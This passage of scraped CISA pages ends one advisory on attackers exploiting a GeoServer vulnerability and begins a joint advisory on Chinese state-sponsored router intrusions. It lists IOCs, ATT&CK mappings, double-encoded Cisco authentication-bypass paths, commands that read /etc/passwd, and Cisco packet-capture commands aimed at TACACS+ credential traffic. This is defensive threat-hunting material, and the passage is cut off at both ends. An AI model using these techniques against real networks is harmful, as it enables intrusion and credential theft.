busybox) - WinRAR archive tool (
Rar.exe) - Stowaway proxy tool (
agent,agent.tar,agent.zip,agentu.exe) - Web shells (
Handx.ashx,start_tomcat.jsp) - Various shell scripts (
mm.sh,t.py,t1.sh,c.bat)
Detection
The cyber threat actors remained undetected in the organization’s environment for three weeks before the organization’s SOC identified the compromise using their EDR tool. On July 31, 2024, their EDR tool identified a 1.txt file uploaded as suspected malware on the SQL Server. The SOC responded to additional alerts when the cyber threat actors transferred 1.txt to the SQL Server through bitsadmin after attempting other LOTL techniques, such as leveraging PowerShell and certutil. The alerts generated by this activity on the SQL server prompted the SOC to contain the server, initiate an investigation, request assistance from CISA, and uncover malicious activity on GeoServer 1.
Lessons Learned
CISA is sharing the following lessons learned based on what CISA learned about the organization’s security posture through incident detection and response activities.
- Vulnerabilities were not promptly remediated.
- The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers.
- The vulnerability was disclosed June 30, 2024, and the cyber threat actors exploited it for initial access to GeoServer 1 on July 11, 2024.
- The vulnerability was added to CISA’s KEV Catalog on July 15, 2024, and by July 24, 2024, the vulnerability was not patched when the cyber threat actors exploited it for access to GeoServer 2.
- Note: FCEB agencies are required to remediate vulnerabilities in CISA’s KEV Catalog within prescribed timeframes under Binding Operational Directive (BOD) 22-01. July 24, 2024, was within the KEV-required patching window for this CVE. However, CISA encourages FCEB agencies and critical infrastructure organizations to address KEV catalog vulnerabilities immediately as part of their vulnerability management plan.
- The agency did not test or exercise their IRP, nor did their IRP enable them to promptly engage third parties and grant third parties’ access to necessary resources.
- On Aug. 1, 2024, upon discovering the endpoint alerts, the agency conducted remote triage of affected systems and used their EDR tool to contain the intrusion.
- After containment, the agency engaged CISA to investigate potential threat actor persistence in their environment.
- Their IRP did not have procedures for bringing in third parties for assistance, which hampered CISA’s efforts to respond to the incident quickly and efficiently.
- The agency could not provide CISA remote access to their security information and event management (SIEM) tool, which initially kept CISA from reviewing all available logs, hindering CISA’s analysis.
- The agency had to go through their change control board process before CISA could deploy their EDR agents.
- The agency could have proactively identified these roadblocks by testing their IRP, such as via a tabletop exercise, but had not tested their plan for a long period.
- On Aug. 1, 2024, upon discovering the endpoint alerts, the agency conducted remote triage of affected systems and used their EDR tool to contain the intrusion.
- EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.
- The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an alert from GeoServer 1 where the EDR detected the Stowaway tool.
- The Web Server lacked endpoint protection.
Indicators of Compromise
See Table 1 for IOCs associated with this activity.
Disclaimer: The IP addresses in this advisory were observed in August 2024, and some may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.
| IOC | Type | Date | Description |
|---|---|---|---|
| 45.32.22[.]62 | IPv4 | Mid-July to early August 2024 | C2 Server IP Address |
| 45.17.43[.]250 | IPv4 | Mid-July to early August 2024 | C2 Server IP Address |
| 0777EA1D01DAD6DC261A6B602205E2C8 | MD5 | Mid-July to early August 2024 | China Chopper Web Shell |
| feda15d3509b210cb05eacc22485a78c | MD5 | Mid-July to early August 2024 | Generic PHP Web Shell |
| C9F4C41C195B25675BFA860EB9B45945 | MD5 | Mid-July to early August 2024 | Linux Exploit CVE-2016-5195 |
| B7B3647E06F23B9E83D0B1CCE3E71642 | MD5 | Mid-July to early August 2024 | Dirtycow |
| 64e3a3458b3286caaac821c343d4b208 | MD5 | Mid-July to early August 2024 | Stowaway Proxy Tool |
| 20b70dac937377b6d0699a44721acd80 | MD5 | Mid-July to early August 2024 | Unknown Downloaded Executable |
| de778443619f37e2224898a9a800fa78 | MD5 | Mid-July to early August 2024 | Unknown Downloaded Executable |
MITRE ATT&CK Tactics and Techniques
See Table 2 through Table 11 for all referenced threat actor tactics and techniques.
| Technique Title | ID | Use |
|---|---|---|
| Active Scanning: Vulnerability Scanning | T1595.002 | The cyber threat actors performed active scanning to identify vulnerabilities they could use for initial access. |
| Technique Title | ID | Use |
|---|---|---|
| Acquire Infrastructure: Virtual Private Server | T1583.003 | The cyber threat actors gained remote access to the victim’s network using a desktop behind a virtual private server (VPS). |
Table 4. Initial Access
| Technique Title | ID | Use |
|---|---|---|
| Exploit Public-Facing Application | T1190 | The cyber threat actors exploited CVE 2024-36401 on two of the organization’s public-facing GeoServers. |
Table 5. Execution
| Technique Title | ID | Use |
|---|---|---|
| Command and Scripting Interpreter: PowerShell | T1059.001 | The cyber threat actors used PowerShell to download a payload. |
Table 6. Defense Evasion
| Technique Title | ID | Use |
|---|---|---|
| Indirect Command Execution | T1202 | The cyber threat actors employed indirect command execution via web shells. |
Table 7. Persistence
| Technique Title | ID | Use |
|---|---|---|
| BITS Jobs | T1197 | The cyber threat actors abused BITS jobs. |
| Scheduled Task/Job: Cron | T1053.003 | The cyber threat actors established persistence through cron jobs. |
| Server Software Component: Web Shell | T1505.003 | The cyber threat actors uploaded web shells for persistence. |
| Valid Accounts | T1078 | The cyber threat actors used valid accounts for persistence. |
Table 8. Privilege Escalation
| Technique Title | ID | Use |
|---|---|---|
| Exploitation for Privilege Escalation | T1068 | The cyber threat actors attempted to exploit CVE-2016-5195 to escalate privileges. |
Table 9. Credential Access
| Technique Title | ID | Use |
|---|---|---|
| Brute Force | T1110 | The cyber threat actors used brute force techniques to obtain login credentials for web services. |
Table 10. Discovery
| Technique Title | ID | Use |
|---|---|---|
| Account Discovery: Local Account | T1087.001 | The cyber threat actors used cat /etc/passwd to discover local users. |
| File and Directory Discovery | T1083 | The cyber threat actors used dir c:\, dir d:\, dir e:\, and type c:\ commands to identify files and directories on the SQL server. |
| Network Service Discovery | T1046 | The cyber threat actors used fscan to identify SSH listeners and FTP servers. |
| Process Discovery | T1057 | The cyber threat actors used tasklist on the SQL server. |
| Remote System Discovery | T1018 | The cyber threat actors performed ping sweeps of hosts within specific subnets. |
| System Information Discovery | T1082 | The cyber threat actors used cat /etc/redhat-release and cat /etc/os-release commands to get Red Hat Enterprise Linux (RHEL) and Linux operating system information. |
| System Network Configuration Discovery | T1016 | The cyber threat actors used ipconfig to check GeoServer 1’s and the SQL server’s network configurations. |
| System Network Connections Discovery | T1049 | The cyber threat actors executed commands such as netstat to obtain a listing of network connections to or from the systems they compromised. |
| System Owner/User Discovery | T1033 | The cyber threat actors used whoami on the SQL server. |
| Technique Title | ID | Use |
|---|---|---|
| Ingress Tool Transfer | T1105 | The cyber threat actors used PowerShell and bitsadmin getfile to download payloads. |
| Proxy | T1090 | The cyber threat actors used a connection proxy to direct traffic from their C2 server. |
Mitigations
CISA recommends organizations implement the mitigations below to improve cybersecurity posture based on lessons learned from the engagement. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
- Establish a vulnerability management plan that includes procedures for prioritization and emergency patching.
- Prioritize patching of known exploited vulnerabilities listed in the KEV catalog.
- CISA urges organizations to address KEV catalog vulnerabilities immediately.
- Prioritize patching vulnerabilities in high-risk systems, including public facing systems as they are attractive targets for threat actors.
- Ensure high-risk systems are identified and prioritized for rapid patching by implementing asset management practices and conducting an asset inventory.
- Continuously discover and validate internet-facing assets through automated asset management and scanning (e.g., attack surface management tools, vulnerability scanners).
- Consider using a configuration management database (CMDB) with discovery and vulnerability tools to enrich asset context and support automated prioritization.
- Form a dedicated team responsible for assessing and implementing emergency patches, this team should include representatives from IT, security, and relevant business units.
- Prioritize patching of known exploited vulnerabilities listed in the KEV catalog.
- Maintain, practice, and update cybersecurity IRPs [CPG 2.S, 5.A].
- Prepare a written IRP policy and IRP with senior leadership support.
- The policy should identify purpose and objectives, what constitutes an incident, prioritization or severity ratings of incidents, clear escalation procedures, IR personnel, and plans for notification, interaction and information sharing with media, law enforcement, and partners.
- The IRP should identify:
- Key personnel with knowledge of the network
- Key resources and courses of action (COAs) for containment and eradication in the event of compromise.
- Procedures for granting third parties prompt access to networks and security tools.
- This should include processes for expediating deployment of EDR and other security tools through change control boards (CCBs).
- The IRP should include procedures for establishing out-of-band communications systems and accounts in case primary systems are compromised or not available (such as with ransomware incidents).
- Periodically test the IRP under real-world conditions, such as via purple team engagements and tabletop exercises.
- During the test, include engagement with third party incident responders and external EDR agents and other tools.
- Following the test, update the IRP as necessary.
- See CISA’s Tabletop Exercise Packages for resources designed to assist organizations with conducting their own exercises.
- For more information on IRPs, see the National Institute of Science and Technology’s (NIST’s) SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile.
- Prepare a written IRP policy and IRP with senior leadership support.
- Implement comprehensive (i.e., large coverage) and verbose (i.e., detailed) logging and aggregate logs in an out-of-band, centralized location.
- Prepare SOCs with sufficient resources to monitor collected logs and responses to malicious cyber threat activity.
- Consider using a SIEM solution for log aggregation and management.
- Identify, alert on, and investigate abnormal network activity (as threat actor activity generates unusual network traffic across all phases of the attack chain).
- Abnormal activity to look for includes:
- Running scans to discover other network connected devices.
- Running commands to list, add, or alter administrator accounts.
- Using PowerShell to download and execute remote programs.
- Running scripts not usually seen on a network.
- For additional information, see joint guide Identifying and Mitigating Living off the Land Techniques, which provides prioritized detection recommendations that enable behavior analytics, anomaly detection, and proactive hunting.
- Abnormal activity to look for includes:
In addition to the above, CISA recommends organizations implement the following mitigations based on threat actor activity:
- Require phishing-resistant MFA for access to all privileged accounts and email services accounts [CPG 2.H].
- Implement allowlisting for applications, scripts, and network traffic to prevent unauthorized execution and access.
Validate Security Controls
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
- Select an ATT&CK technique described in this advisory (see Table 3 through Table 11).
- Align your security technologies against the technique.
- Test your technologies against the technique.
- Analyze your detection and prevention technologies’ performance.
- Repeat the process for all security technologies to obtain a set of comprehensive performance data.
- Tune your security program, including people, processes, and technologies, based on the data generated by this process.
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Resources
- Incident Response Plan (IRP) Basics
- Identifying and Mitigating Living Off the Land Techniques
- Phishing-Resistant Multi-Factor Authentication (MFA) Success Story: USDA’s Fast IDentity Online (FIDO) Implementation
Disclaimer
The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.
Version History
September 23, 2025: Initial version.
Apendix: Key Events Timeline
| Date/Time | Relevant Host | Event |
|---|---|---|
| July 1, 2024 | n/a | CVE-2024-36401 published. |
| July 11, 2024 | GeoServer 1 | Initial Access to GeoServer 1. |
| July 15, 2024 | n/a | CVE-2024-36401 added to CISA’s Known Exploited Vulnerabilities Catalog. |
| July 15, 2024 | GeoServer 1 | EDR detects Stowaway tool on GeoServer 1. |
| July 24, 2024 | GeoServer 2 | Initial Access to GeoServer 2. |
| July 31, 2024 | Web Server | Initial Access to Web Server. |
| July 31, 2024 | SQL Server | Initial Access to SQL Server. |
| Aug. 1, 2024 | SQL Server, GeoServer 1 | Organization observes SQL Alert and contains SQL Server and GeoServer 1. |
| Aug. 1, 2024 | n/a | The impacted organization requested assistance from CISA. |
| Aug. 5, 2024 | n/a | CISA began forensic artifact analysis. |
| Aug. 6, 2024 | GeoServer 2 | Last observed threat actors’ activity—discovery commands on GeoServer 2. |
| Aug. 8 – Sept. 3, 2024 | n/a | CISA conducted their full incident response. |
Notes
[1] “GeoServer/GeoServer,” GitHub, published July 1, 2024, https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w.
[2] “firefart/dirtycow,” GitHub, last modified 2021, https://github.com/firefart/dirtycow.
[3] “T4y1oR/RingQ” GitHub, last modified February 19, 2025. https://github.com/T4y1oR/RingQ.
[4] “shadow1ng/fscan,” GitHub, last modified July 2025, https://github.com/shadow1ng/fscan.
[5] “ph4ntonn/Stowaway,” GitHub, last modified April 2025, https://github.com/ph4ntonn/Stowaway.
-
CISA Blog
- The Mandate, Mission, and Momentum to lead the CVE Program into the Future belongs to CISA
The Mandate, Mission, and Momentum to lead the CVE Program into the Future belongs to CISA
-
CISA Alerts
- Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System
Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System
Executive summary
People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. While these actors focus on large backbone routers of major telecommunications providers, as well as provider edge (PE) and customer edge (CE) routers, they also leverage compromised devices and trusted connections to pivot into other networks. These actors often modify routers to maintain persistent, long-term access to networks.
This activity partially overlaps with cyber threat actor reporting by the cybersecurity industry—commonly referred to as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor, among others. The authoring agencies are not adopting a particular commercial naming convention and hereafter refer to those responsible for the cyber threat activity more generically as “Advanced Persistent Threat (APT) actors” throughout this advisory. This cluster of cyber threat activity has been observed in the United States, Australia, Canada, New Zealand, the United Kingdom, and other areas globally.
This Cybersecurity Advisory (CSA) includes observations from various government and industry investigations where the APT actors targeted internal enterprise environments, as well as systems and networks that deliver services directly to customers. This CSA details the tactics, techniques, and procedures (TTPs) leveraged by these APT actors to facilitate detection and threat hunting, and provides mitigation guidance to reduce the risk from these APT actors and their TTPs.
This CSA is being released by the following authoring and co-sealing agencies:
- United States National Security Agency (NSA)
- United States Cybersecurity and Infrastructure Security Agency (CISA)
- United States Federal Bureau of Investigation (FBI)
- United States Department of Defense Cyber Crime Center (DC3)
- Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
- Canadian Centre for Cyber Security (Cyber Centre)
- Canadian Security Intelligence Service (CSIS)
- New Zealand National Cyber Security Centre (NCSC-NZ)
- United Kingdom National Cyber Security Centre (NCSC-UK)
- Czech Republic National Cyber and Information Security Agency (NÚKIB) - Národní úřad pro kybernetickou a informační bezpečnost
- Finnish Security and Intelligence Service (SUPO) - Suojelupoliisi
- Germany Federal Intelligence Service (BND) - Bundesnachrichtendienst
- Germany Federal Office for the Protection of the Constitution (BfV) - Bundesamt für Verfassungsschutz
- Germany Federal Office for Information Security (BSI) - Bundesamt für Sicherheit in der Informationstechnik
- Italian External Intelligence and Security Agency (AISE) - Agenzia Informazioni e Sicurezza Esterna
- Italian Internal Intelligence and Security Agency (AISI) - Agenzia Informazioni e Sicurezza Interna
- Japan National Cybersecurity Office (NCO) - 国家サイバー統括室
- Japan National Police Agency (NPA) - 警察庁
- Netherlands Defence Intelligence and Security Service (MIVD) - Militaire Inlichtingen- en Veiligheidsdienst
- Netherlands General Intelligence and Security Service (AIVD) - Algemene Inlichtingen- en Veiligheidsdienst
- Polish Military Counterintelligence Service (SKW) - Służba Kontrwywiadu Wojskowego
- Polish Foreign Intelligence Agency (AW) - Agencja Wywiadu
- Spain National Intelligence Centre (CNI) - Centro Nacional de Inteligencia
The authoring agencies strongly urge network defenders to hunt for malicious activity and to apply the mitigations in this CSA to reduce the threat of Chinese state-sponsored and other malicious cyber activity.
Any mitigation or eviction measures listed within are subject to change as new information becomes available and ongoing coordinated operations dictate. Network defenders should ensure any actions taken in response to the CSA are compliant with local laws and regulations within the jurisdictions within which they operate.
Background
The APT actors have been performing malicious operations globally since at least 2021. These operations have been linked to multiple China-based entities, including at least Sichuan Juxinhe Network Technology Co. Ltd. (四川聚信和网络科技有限公司), Beijing Huanyu Tianqiong Information Technology Co., Ltd. (北京寰宇天穹信息技术有限公司), and Sichuan Zhixin Ruijie Network Technology Co., Ltd. (四川智信锐捷网络科技有限公司). These companies provide cyber-related products and services to China’s intelligence services, including multiple units in the People’s Liberation Army and Ministry of State Security. The data stolen through this activity against foreign telecommunications and Internet service providers (ISPs), as well as intrusions in the lodging and transportation sectors, ultimately can provide Chinese intelligence services with the capability to identify and track their targets’ communications and movements around the world.
For more information on PRC state-sponsored malicious cyber activity, see CISA’s People's Republic of China Cyber Threat Overview and Advisories webpage.
Download the PDF version of this report:
For a downloadable list of IOCs, visit:
Cybersecurity Industry Tracking
The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to this Chinese state-sponsored cyber activity. While not all encompassing, the following are the most notable threat group names related to this activity and commonly used within the cybersecurity community:
- Salt Typhoon,
- OPERATOR PANDA,
- RedMike,
- UNC5807, and
- GhostEmperor.
Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring agencies’ understanding for all activity related to these groupings.
Technical details
The following sections are a compilation of TTPs the APT actors have used since at least 2021 to target enterprise environments. Particularly notable TTPs include modifying router configurations for lateral movement pivoting between networks and using virtualized containers on network devices to evade detection. The actors continue to use many of the TTPs listed, but expect them to evolve when existing TTPs no longer achieve their goals. Even if no longer used regularly, the actors may still use previous TTPs opportunistically in favorable conditions. The TTP descriptions can also be useful to network defenders for retroactive threat hunting.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 17 and MITRE ATT&CK for ICS framework, version 17. See the Appendix A: MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the APT actors’ activity mapped to MITRE ATT&CK tactics and techniques.
Initial access
Investigations associated with these APT actors indicate that they are having considerable success exploiting publicly known common vulnerabilities and exposures (CVEs) and other avoidable weaknesses within compromised infrastructure [T1190]. Exploitation of zero-day vulnerabilities has not been observed to date. The APT actors will likely continue to adapt their tactics as new vulnerabilities are discovered and as targets implement mitigations, and will likely expand their use of existing vulnerabilities. The following list is not exhaustive and the authoring agencies suspect that the APT actors may target other devices (e.g., Fortinet firewalls, Juniper firewalls, Microsoft Exchange, Nokia routers and switches, Sierra Wireless devices, Sonicwall firewalls, etc.).
If not yet patched, defenders should prioritize the following CVEs due to their historical exploitation on exposed network edge devices by these APT actors. Example exploited CVEs, ordered by year, include:
- CVE-2024-21887 - Ivanti Connect Secure and Ivanti Policy Secure web-component command injection vulnerability, commonly chained after CVE-2023-46805 (authentication bypass)
- CVE-2024-3400 - Palo Alto Networks PAN-OS GlobalProtect arbitrary file creation leading to OS command injection. The CVE allows for unauthenticated remote code execution (RCE) on firewalls when GlobalProtect is enabled on specific versions/configurations.
- CVE-2023-20273 - Cisco Internetworking Operating System (IOS) XE software web management user interface post-authentication command injection/privilege escalation (commonly chained with CVE-2023-20198 for initial access to achieve code execution as root) [T1068]
- CVE-2023-20198 - Cisco IOS XE web user interface authentication bypass vulnerability
- While exploiting CVE-2023-20198, the APT actors used the Web Services Management Agent (WSMA) endpoints
/webui_wsma_Httpor/webui_wsma_Httpsto bypass authentication and create unauthorized administrative accounts. In some cases, the APT actors obfuscated requests by “double encoding” portions of the path, e.g.,/%2577eb%2575i_%2577sma_Httpor/%2577eb%2575i_%2577sma_Https[T1027.010]. Observed requests varied in case, so hunting and detection should be case-insensitive and tolerant of over-encoding. - After patching this CVE, WSMA endpoints requests are internally proxied, and the system adds a
Proxy-Uri-Source HTTPheader as part of the remediation logic. The presence ofProxy-Uri-Sourceheader in traffic to/webui_wsma_*indicates a patched device handling the request, not exploitation. This can help distinguish between vulnerable and remediated systems when analyzing logs or captures.
- While exploiting CVE-2023-20198, the APT actors used the Web Services Management Agent (WSMA) endpoints
- CVE-2018-0171 - Cisco IOS and IOS XE smart install remote code execution vulnerability
The APT actors leverage infrastructure, such as virtual private servers (VPSs) [T1583.003] and compromised intermediate routers [T1584.008], that have not been attributable to a publicly known botnet or obfuscation network infrastructure to target telecommunications and network service providers, including ISPs [T1090].
The APT actors may target edge devices regardless of who owns a particular device. Devices owned by entities who do not align with the actors’ core targets of interest still present opportunities for use in attack pathways into targets of interest. The actors leverage compromised devices and trusted connections or private interconnections (e.g., provider-to-provider or provider-to-customer links) to pivot into other networks [T1199]. In some instances, the actors modify routing and enable traffic mirroring (switch port analyzer (SPAN)/remote SPAN (RSPAN)/encapsulated remote SPAN (ERSPAN) where available) on compromised network devices and configure Generic Routing Encapsulation (GRE)/IPsec tunnels and static routes to achieve the same goal [T1095]. Additionally, these APT actors often simultaneously exploit large numbers of vulnerable, Internet-exposed devices across many IP addresses and may revisit individual systems for follow-on operations.
Initial access vectors remain a critical information gap for parties working to understand the scope, scale, and impact of the actors’ malicious activity. The authoring agencies encourage organizations to provide compromise details to appropriate authorities (see Contact information) to continue improving all parties’ understanding and responses.
Persistence
To maintain persistent access to target networks, the APT actors use a variety of techniques. Notably, a number of these techniques can obfuscate the actors’ source IP address in system logs, as their actions may be recorded as originating from local IP addresses [T1027]. Specific APT actions include:
- Modifying Access Control Lists (ACLs) to add IP addresses. This alteration allows the actors to bypass security policies and maintain ongoing access by explicitly permitting traffic from a threat actor-controlled IP address [T1562.004].
- The APT actors often named their ACLs “access-list 20”. When 20 was already used, the actors commonly used 50 or 10.
- Opening standard and non-standard ports, which can open and expose a variety of different services (e.g., Secure Shell [SSH], Secure File Transfer Protocol [SFTP], Remote Desktop Protocol [RDP], File Transfer Protocol [FTP], HTTP, HTTPS) [T1071]. This strategy supplies multiple avenues for remote access and data exfiltration. Additionally, utilizing non-standard ports can help the APT actors evade detection by security monitoring tools that focus on standard port activity [T1571].
- The APT actors have been enabling SSH servers and opening external-facing ports on network devices to maintain encrypted remote access [T1021.004]. In some cases, the SSH services were established on high, non-default Transmission Control Protocol (TCP) ports using the port numbering scheme of
22x22orxxx22, though port patterns may vary across intrusions. The actors may add keys to existing SSH services to regain entry into network devices [T1098.004]. - The APT actors enable or abuse built-in HTTP/HTTPS management servers and sometimes reconfigure them to non-default high ports. Note: HTTP servers have been observed using the port numbering scheme of
18xxx.- Enabling HTTP/HTTPS servers on Cisco devices affected by CVE-2023-20198. If the web UI feature is enabled on Cisco IOS XE Software, this vulnerability provides an entry opportunity for the APT actors.
- The APT actors have been enabling SSH servers and opening external-facing ports on network devices to maintain encrypted remote access [T1021.004]. In some cases, the SSH services were established on high, non-default Transmission Control Protocol (TCP) ports using the port numbering scheme of
- Following compromise of a router, the following commands and activities have been observed on compromised devices [T1059.008]:
- Executing commands via SNMP [T1569].
- SSH activity from remote or local IP addresses.
- Web interface panel (POST) requests.
- When present, using service or automation credentials (e.g., those used by configuration-archival systems such as RANCID) to enumerate and access other networking devices.
- Executing Tcl scripts (e.g.,
TCLproxy.tclandmap.tcl) on Cisco IOS devices wheretclshwas available.
- Depending on the configuration of the Simple Network Management Protocol (SNMP) on the compromised network device, the APT actors enumerate and alter the configurations for other devices in the same community group, when possible [T1021]. Note: Properly configured SNMPv3 is considerably more secure than previous versions.
- Utilizing SNMPwalk (SNMP GET/WALK) to enumerate devices from APT actor-controlled hosts. Where configuration changes were observed, they were issued as SNMP SET requests to writable objects from those hosts [T1016].
- Creating tunnels over protocols, such as Generic Routing Encapsulation (GRE), multipoint GRE (mGRE), or IPsec, on network devices, presumably based on what would be expected in the environment [T1572].
- These tunnels allow for the encapsulation of multiple network layer protocols over a single tunnel, which can create persistent and covert channels for data transmission to blend in with normal network traffic.
- Some of these actions may obscure the APT actors’ source IP address in logs due to being logged as a local IP.
- Running commands in an on-box Linux container on supported Cisco networking devices to stage tools, process data locally, and move laterally within the environment. This often allows the APT actors to conduct malicious activities undetected because activities and data within the container are not monitored closely. [T1610] [T1588.002] [T1588.005] [T1059.006].
- Within Guest Shell, running Python (such as siet.py to exploit Cisco Smart Install) and native Linux tooling, installing packages (e.g., via
pip/yumwhere available), parsing and staging locally collected artifacts (e.g., configurations, packet captures) on device storage [T1560]. On NX-OS devices specifically, usingdohostto script host-level CLI actions for reconnaissance and persistence. For Cisco IOS XE, Guest Shell is a Linux container (LXC) managed by IOx that is enabled withguestshell enableand accessed withguestshell run bash. By default, processes inside Guest Shell egress via the management virtual routing and forwarding (VRF) instance. On platforms without a dedicated management port, connectivity can be provided with aVirtualPortGroupinterface. Guest Shell can execute Python and other 64-bit Linux applications and can read/write device-accessible storage (e.g., flash) as configured. [T1609] [T1543.005] - For Cisco NX-OS, Guest Shell is an LXC environment entered with
run guestshell. It has direct access tobootflash:and can invoke host NX-OS CLI via thedohostutility. Networking uses the device’s default VRF by default. Operators (or malware) can run commands in other VRFs usingchvrf. Systemd-managed services are typically long-running components inside Guest Shell. - Using
guestshell disableandguestshell destroycommands to deactivate and uninstall Guest Shell container and return all resources to the system [T1070.009].
- Within Guest Shell, running Python (such as siet.py to exploit Cisco Smart Install) and native Linux tooling, installing packages (e.g., via
- Leveraging open source multi-hop pivoting tools, such as STOWAWAY, to build chained relays for command and control (C2) and operator access, including interactive remote shells, file upload and download, SOCKS5/HTTP proxying, and local/remote port mapping with support for forward and reverse connections over encrypted node-to-node links [T1090.003].
Lateral movement & collection
Following initial access, the APT actors target protocols and infrastructure involved in authentication—such as Terminal Access Controller Access Control System Plus (TACACS+)—to facilitate lateral movement across network devices, often through SNMP enumeration and SSH. From these devices, the APT actors passively collect packet capture (PCAP) from specific ISP customer networks [T1040] [T1005]. To further support discovery and lateral movement, the APT actors may target:
- Authentication Protocols including TACACS+ and Remote Authentication Dial-In User Service (RADIUS)
- Managed Information Base (MIB) [T1602.001]
- Router interfaces
- Resource Reservation Protocol (RSVP) sessions
- Border Gateway Protocol (BGP) routes
- Installed software
- Configuration files [T1590.004] [T1602.002]
- This is achieved either from existing sources in the network (e.g., output of provider scripts) or through active survey of devices and Trivial File Transfer Protocol (TFTP), to include Multiprotocol Label Switching (MPLS) configuration information.
- In-transit network traffic using native capabilities to capture or mirror traffic via the SPAN, RSPAN, or ERSPAN capabilities available on many router models.
- Provider-held data, such as:
- Subscriber information
- User content
- Customer records and metadata
- Network diagrams, inventories, device configurations, and vendor lists
- Passwords
Capturing network traffic containing credentials via compromised routers is a common method for further enabling lateral movement [T1040]. This typically takes the form of:
- Leveraging native PCAP functionalities (e.g., Cisco’s Embedded Packet Capture) on routers to collect RADIUS or TACACS+ authentication traffic, which may contain credentials transmitted in cleartext or weakly protected forms.
- PCAPs have been observed containing naming schemes such as
mycap.pcap,tac.pcap,1.pcap, or similar variations.
- PCAPs have been observed containing naming schemes such as
- Modifying a router’s TACACS+ server configuration to point to an APT actor-controlled IP address [T1556]. These actors may use this capability to capture authentication attempts from network administrators or other devices. They may also adjust Authentication, Authorization, and Accounting (AAA) configurations, forcing devices to use less secure authentication methods or send accounting information to their infrastructure.
The APT actors collect traffic at Layer 2 or 3 (depending on the protocol used), largely from Cisco IOS devices; however, targeting of other device types is also likely. Based on analysis, the APT actors hold interest in making configuration and routing changes to the devices after compromising the routers. While some actions are specific to Cisco devices, the actors are capable of targeting devices from other vendors and could utilize similar functionality. The APT actors perform several of the modifications or techniques below to facilitate follow-on actions.
- Creating accounts/users and assigning privileges to those accounts, often via modifying router configurations [T1136.001].
- Brute forcing and re-using credentials to access Cisco devices. If a router configuration is collected during initial exploitation and contains a weak hashed Cisco Type 5 (MD5) or 7 (legacy, weak reversible encoding) password [T1003] [T1110.002]. Weak credentials, such as “cisco” as the username and password, are routinely exploited through these techniques.
- Scanning for open ports and services and mirroring (SPAN/RSPAN sessions), allowing traffic monitoring from multiple interfaces [T1595].
- Running commands on the router via SNMP, SSH, and HTTP GET or POST requests. These requests typically target privileged execution paths, such as
/level/15/exec/-/*, and may include instructions to display configuration files, access BGP routes, manage VRF instances, or clear system logs [T1082].- Many compromised devices use well known SNMP community strings, including “public” and “private”.
- Configuring PCAP capabilities to collect network traffic.
- Configuring tunnels.
- Using monitoring tools present in the environment to monitor a device’s (commonly a router’s) configuration changes.
- Updating routing tables to route traffic to actor-controlled infrastructure.
- Using several techniques to avoid detection of their activity, including:
- Deleting and/or clearing logs, possibly in tandem with reverting or otherwise modifying stored configuration files to avoid leaving traces of the modifications [T1070].
- Disabling logging and/or disabling sending logs to central servers.
- Stopping/starting event logging on network devices.
- Configuring a Cisco device to run a Guest Shell container to evade detection from collecting artifacts, data, or PCAP [T1610].
Exfiltration
A key concern with exfiltration is the APT actors’ abuse of peering connections (i.e., a direct interconnection between networks that allows traffic exchange without going through an intermediary) [T1599]. Exfiltration may be facilitated due to a lack of policy restraints or system configurations limiting the types of data received by peered ISPs.
Analysis indicates that the APT actors leverage separate (potentially multiple) command and control channels for exfiltration to conceal their data theft within the noise of high-traffic nodes, such as proxies and Network Address Translation (NAT) pools. The APT actors often use tunnels, such IPsec and GRE, to conduct C2 and exfiltration activities [T1048.003].
Case study
This section details techniques employed by the APT actors, as well as indicators received from analysis to detect this activity. The APT actors were stopped before further actions could be taken on the compromised network.
Collecting native PCAP
The APT actors collected PCAPs using native tooling on the compromised system, with the primary objective likely being to capture TACACS+ traffic over TCP port 49. TACACS+ packet bodies can be decrypted if the encryption key is known. In at least one case, the device configuration stored the TACACS+ shared secret using Cisco Type 7 reversible obfuscated encoding. Recovering that secret from the configuration would enable offline decryption of captured TACACS+ payloads. TACACS+ traffic is used for authentication, often for administration of network equipment and including highly privileged network administrators accounts and credentials, likely enabling the actors to compromise additional accounts and perform lateral movement.
The commands listed in Table 1 were observed on a Cisco IOS XE-based host to aid PCAP exfiltration.
| Command | Description |
|---|---|
| monitor capture mycap interface <interface-name> both | Set up a packet capture named 'mycap' |
| monitor capture mycap match ipv4 protocol tcp any any eq 49 | Target port 49 on the above interface - TACACS+ |
| monitor capture mycap buffer size 100 | |
